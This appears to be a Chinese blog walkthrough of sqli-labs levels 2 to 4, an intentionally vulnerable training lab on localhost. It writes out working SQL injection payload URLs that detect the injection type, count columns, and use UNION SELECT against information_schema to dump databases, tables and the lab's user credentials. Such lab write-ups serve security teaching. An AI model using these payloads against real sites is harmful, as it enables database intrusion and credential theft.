sqli-labs-master less02-04
sql注入0-4关只存在注入方式的区别
第一关 ?id=1'--+ '
第二关 ?id=1--+ 无
第三关 ?id=1')--+ ‘)
第四关 ?id=1")--+ ")
过程同 sqli-labs-master less01,此处只提供less02代码。
判断断sql注入类型:
http://localhost/sqli-labs-master/Less-2?id=1 结果正常
http://localhost/sqli-labs-master/Less-1/?id=1' 报错
http://localhost/sqli-labs-master/Less-1/?id=1'--+ 报错
结果:数字型注入
判断sql查询语句中的字段数:
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4 报错不存在
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3 成功显示
结果:字段数为3
判断回显的字段数:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3
结果:回显 2 和 3
利用回显字段位置爆库
获取数据库:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
结果:information_schema,challenges,dvwa,jokedb,mysql,pikachu,pkxss,security,test
获取security库的表:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+
结果:emails,referers,uagents,users
获取security库的users表:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
结果:id,user,password
获取security库的users的字段信息:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x2d,id,username,password)) from security.users
结果:1-Dumb-Dumb,2-Angelina-I-kill-you,3-Dummy-p@ssword,4-secure-crappy,5-stupid-stupidity,6-superman-genious,7-batman-mob!le,8-admin-admin,9-admin1-admin1,10-admin2-admin2,11-admin3-admin3,12-dhakkan-dumbo,14-admin4-admin4
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了